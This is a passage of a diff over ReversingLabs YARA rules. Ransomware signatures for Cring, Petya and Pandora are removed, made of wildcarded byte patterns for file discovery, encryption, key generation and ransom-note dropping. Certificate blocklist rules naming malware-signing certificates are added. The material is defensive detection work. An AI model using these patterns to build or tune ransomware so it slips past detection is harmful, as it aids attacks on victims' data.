50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 - 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 - } - $encrypt_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD - ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D - 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74 - ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89 - 55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8 - ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ?? - E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? - 33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_files = { - 52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89 - A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC - 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE { meta: - description = "Yara rule that detects Cring ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "76530a6d-145b-5316-8200-4b191d0754fd" - date = "2021-08-12" - modified = "2021-08-12" + id = "f86fbd6f-1635-56d7-b390-e067f81b8705" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14368-L14384" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Cring" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ?? - 18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F - ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A - } - $find_files_p2 = { - 02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ?? - ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? - ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C - ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? - 9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ?? - ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69 - 32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28 - ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? - ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ?? - ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ?? - ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ?? - ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28 - ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? - ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ?? - ?? ?? ?? DC 06 2A - } - $encrypt_files = { - 16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E - 5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ?? - ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ?? - 08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04 - 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02 - 19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ?? - 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 - ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? - 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F - ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and pe.signatures[i].serial=="3c:e6:5e:a0:57:b9:75:d2:c1:7e:af:2c:22:97:b1:eb" and 1528243200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5D085A9A288549D09Edc4941 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "8fa1f434-2061-5131-9378-58c584eff447" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14386-L14402" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dff7c2d727acca753b030d05028590e1a5577121bb2b4c0dcfcb70b4c9d77cbf" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE { meta: - description = "Yara rule that detects Petya ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2" - date = "2020-07-15" - modified = "2020-07-15" + id = "5344bda2-bc11-5700-a0f7-52792c5bb87a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14404-L14420" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Petya" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $entry_point = { - 55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ?? - ?? ?? ?? 8B C7 5F 5E 5D C2 - } - $shutdown_pattern = { - 55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 - 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D - 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B - E5 5D C3 - } - $sectionxxxx_pattern = { - 83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0 - 74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ?? - ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B - E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24 - ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72 - ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A - 03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F - 5E 5D 0F B6 C2 5B 83 C4 ?? C3 - } - $crypt_gen_pattern = { - 55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ?? - ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D - C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "0a156a49-c737-5bdb-9178-34121af490d6" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14422-L14438" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($entry_point at pe.entry_point) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE { meta: - description = "Yara rule that detects Pandora ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e" - date = "2022-06-01" - modified = "2022-06-01" + id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14440-L14456" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Pandora" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? - ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? - ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F - 4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ?? - 0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA - ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA - 49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83 - F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ?? - 4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5 - 48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ?? - 48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01 - } - $find_files_p2 = { - F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC - C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C - CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B - 54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB - ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54 - 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24 - ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85 - C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 - 5F C3 - } - $generate_key = { - 41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 - 8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ?? - ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01 - E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F - B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48 - 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ?? - 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? - ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0 - 48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48 - 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? - BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0 - } - $drop_ransom_note = { - 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? - ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B - 0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48 - 8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ?? - ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ?? - ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ?? - ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? - 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF - E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? - 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF - E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? - BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 - C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? - ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? - ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D - 54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9 - ?? ?? ?? ?? 